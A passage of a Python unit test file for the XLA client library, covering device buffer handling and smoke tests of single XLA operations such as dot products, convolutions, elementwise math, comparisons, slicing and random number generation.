arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.block_until_ready()
# This test merely checks that nothing goes awry when we call
# block_until_ready(); it's difficult to test anything else.
def testBlockUntilReadyRaisesOnDeletedBuffer(self):
arg = np.array([[1., 2.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
buffer.delete()
with self.assertRaisesRegex(
RuntimeError,
re.escape(
"BlockHostUntilReady() called on deleted or donated buffer")):
buffer.block_until_ready()
def testDeviceArrayBaseSignatures(self):
# When extending `DeviceArrayBase`, the object behaves as a `DeviceArray`
# and thus needs to correctly implement the following methods.
arg = np.array([[1., 2., 3.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
if not isinstance(buffer, xla_client.DeviceArrayBase):
raise unittest.SkipTest(
"The objectof type {} do not extend DeviceArrayBase".format(
type(buffer)))
self.assertEqual(buffer.__array_priority__, 100)
self.assertEqual(buffer.shape, (1, 3))
self.assertEqual(buffer.dtype, np.float32)
self.assertEqual(buffer.size, 3)
self.assertEqual(buffer.ndim, 2)
self.assertIs(buffer, buffer.block_until_ready())
self.assertTrue(buffer.is_ready())
buffer.delete()
with self.assertRaises(RuntimeError):
buffer.block_until_ready()
with self.assertRaises(RuntimeError):
buffer.is_ready()
def testOnDeviceSizeInBytes(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support OnDeviceSizeInBytes.")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertEqual(arg0_buffer.on_device_size_in_bytes(), 0)
# OnDeviceSizeInBytes varies depending on the platform. Confirm there's
# a reasonable value.
self.assertGreater(arg1_buffer.on_device_size_in_bytes(), 0)
self.assertGreater(arg2_buffer.on_device_size_in_bytes(), 0)
def testLiveBuffers(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support LiveBuffers().")
self.assertEmpty(self.backend.live_buffers())
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertLen(self.backend.live_buffers(), 3)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg1_buffer)
self.assertIs(self.backend.live_buffers()[2], arg0_buffer)
self.assertEqual(self.backend.devices()[0].live_buffers(),
self.backend.live_buffers())
arg1_buffer.delete()
self.assertLen(self.backend.live_buffers(), 2)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg0_buffer)
arg0_buffer.delete()
arg2_buffer.delete()
self.assertEmpty(self.backend.live_buffers())
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8, dtype=np.int32)
for device in self.backend.local_devices():
buf = self.backend.buffer_from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
def testStandardTypes(self):
for dtype in standard_dtypes:
if dtype == bfloat16 or dtype == np.complex128:
continue
arr = self.backend.buffer_from_pyval(np.array([0, 1], dtype))
arr = arr.to_py()
self.assertEqual(dtype, type(arr[0]))
def testUnsafeBufferPointer(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support UnsafeBufferPointer().")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertGreaterEqual(arg0_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg1_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg2_buffer.unsafe_buffer_pointer(), 0)
@unittest.skipIf(cloud_tpu, "not implemented")
def testClone(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
z = y.clone()
self.assertNotEqual(id(x), id(y))
np.testing.assert_array_equal(y.to_py(), z.to_py())
self.assertEqual(y.unsafe_buffer_pointer(), z.unsafe_buffer_pointer())
@unittest.skipIf(cloud_tpu, "not implemented")
def testJaxAttributesHaveCorrectDefaults(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
self.assertIsNone(y.aval)
self.assertIsNone(y._device)
tests.append(BufferTest)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConcatenate(self, dtype):
c = self._NewComputation()
args = (
ops.Constant(c, np.array([1.0, 2.0, 3.0], dtype=dtype)),
ops.Constant(c, np.array([4.0, 5.0, 6.0], dtype=dtype)),
)
ops.ConcatInDim(c, args, dimension=0)
self._ExecuteAndCompareExact(
c, expected=[np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], dtype=dtype)])
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
} for src_dtype, dst_dtype in itertools.permutations(
[np.bool_, np.int32, np.int64, np.float32, np.float64], 2))
# pyformat: enable
def testConvertElementType(self, src_dtype, dst_dtype):
if ((src_dtype in [np.int64, np.float64] or
dst_dtype in [np.int64, np.float64]) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.ConvertElementType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = np.array(x, dtype=dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# pyformat: disable
@parameterized.named_parameters(
{
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
}
for dtypes in [[np.int32, np.float32], [np.int64, np.float64]]
for src_dtype, dst_dtype in itertools.permutations(dtypes, 2))
# pyformat: enable
def testBitcastConvertType(self, src_dtype, dst_dtype):
if (np.float64 in (src_dtype, dst_dtype) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.BitcastConvertType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = x.view(dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
ops.AllToAll(ops.Constant(c, lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=[lhs])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(ops.Constant(c, lhs))
self._ExecuteAndCompareExact(c, expected=[lhs])
def testReplicaId(self):
c = self._NewComputation()
_ = ops.ReplicaId(c)
self._ExecuteAndCompareExact(c, expected=[0])
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(
ops.Constant(c, lhs), xla_client.make_replica_groups([[0]]))
self._ExecuteAndCompareExact(c, expected=[lhs])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixVector(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0], [20.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixMatrix(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0, 20.0], [100.0, 200.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
ops.DotGeneral(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
ops.ConvGeneralDilated(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NHWC", "OIHW", "CWNH"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, np.transpose(lhs,
(0, 2, 3, 1))), ops.Constant(c, rhs),
strides, pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(
c, expected=[np.transpose(result, (1, 3, 0, 2))])
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
feature_group_count = 2
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
ops.Not(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[~arr])
def testPopulationCount(self):
c = self._NewComputation()
arr = NumpyArrayS32([3, 0, 1])
ops.PopulationCount(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.array([2, 0, 1])])
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
ops.Clz(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[[17, 3]])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Exp(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.exp(arr)])
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Expm1(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.expm1(arr)])
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Round(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.round(arr)])
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log(arr)])
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log1p(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log1p(arr)])
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Neg(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[-arr])
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Floor(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.floor(arr)])
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Ceil(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.ceil(arr)])
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
ops.Abs(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.abs(arr)])
def testTanhF32(self):
c = self._NewComputation()
arr = NumpyArrayF32([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)])
def testTanhF64(self):
if self.backend.platform == "tpu":
self.skipTest("TPU doesn't support 64bit tanh")
c = self._NewComputation()
arr = NumpyArrayF64([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)], rtol=1e-12)
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
ops.Transpose(ops.Constant(c, array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=[expected])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
ops.Eq(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
def testNe(self):
c = self._NewComputation()
ops.Ne(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, True]])
ops.Ne(
ops.Constant(c, NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
ops.Constant(c, NumpyArrayF32([2.0, -0.0, 1.0,
float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose,
c, (),
expected=[[True, False, True, True]])
def testGt(self):
c = self._NewComputation()
ops.Gt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, True, True, False, False]])
def testGe(self):
c = self._NewComputation()
ops.Ge(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, True, True, False, False]])
def testLt(self):
c = self._NewComputation()
ops.Lt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, False, False, True, True]])
def testLe(self):
c = self._NewComputation()
ops.Le(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, False, False, True, True]])
def testMax(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 2.0, 3.0, 7.0, 12.0]])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 3, 3], [4, 5, 6], [7, 8, 9]]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 4, 5], [4, 5, 6], [7, 8, 9]]])
def testMin(self):
c = self._NewComputation()
ops.Min(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 0.0, 2.0, 4.0, 9.0]])
def testPad(self):
c = self._NewComputation()
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)),
xla_client.make_padding_config([(1, 2, 1), (0, 1, 0)]))
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testReshape(self):
c = self._NewComputation()
ops.Reshape(
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [4, 5, 6]]])
def testCollapse(self):
c = self._NewComputation()
ops.Collapse(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3, 4], [5, 6, 7, 8]]])
def testRev(self):
c = self._NewComputation()
ops.Rev(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]])
def testReducePrecision(self):
c = self._NewComputation()
ops.ReducePrecision(
ops.Constant(c, NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[[float.fromhex("0x1.32p-3")]])
def testClampF32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayF32(-1)),
ops.Constant(c, NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testClampS32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayS32(-1)),
ops.Constant(c, NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testSelect(self):
c = self._NewComputation()
ops.Select(
ops.Constant(c, NumpyArrayBool([True, False, False, True, False])),
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 5])),
ops.Constant(c, NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[[1, -2, -3, 4, -5]])
def testSlice(self):
c = self._NewComputation()
ops.Slice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[1, 0], [3, 2], [1, 1])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testSliceInDim(self):
c = self._NewComputation()
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[[2], [5], [8]]])
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [7, 8, 9]]])
def testDynamicSlice(self):
c = self._NewComputation()
ops.DynamicSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[ops.Constant(c, NumpyArrayS32([1, 0]))], [2, 2])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
ops.DynamicUpdateSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4]])),
[ops.Constant(c, NumpyArrayS32([1, 1]))])
self._ExecuteAndCompareExact(
c, expected=[[[1, 2, 3], [4, 1, 2], [7, 3, 4]]])
def testTuple(self):
c = self._NewComputation()
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
])
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 3)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
ops.GetTupleElement(
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
]), 1)
self._ExecuteAndCompareClose(c, expected=[[1.0, 2.0]])
def testBroadcast(self):
c = self._NewComputation()
ops.Broadcast(
ops.Constant(c, NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]])
def testBroadcastInDim(self):
c = self._NewComputation()
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[[1, 1], [2, 2]]])
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[[1, 2], [1, 2]]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
ops.RngNormal(
ops.Constant(c, NumpyArrayF32(0.)),
ops.Constant(c, NumpyArrayF32(1.)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape and uniqueness
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayF32(lo)),
ops.Constant(c, NumpyArrayF32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, uniqueness, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayS32(lo)),
ops.Constant(c, NumpyArrayS32(hi)),
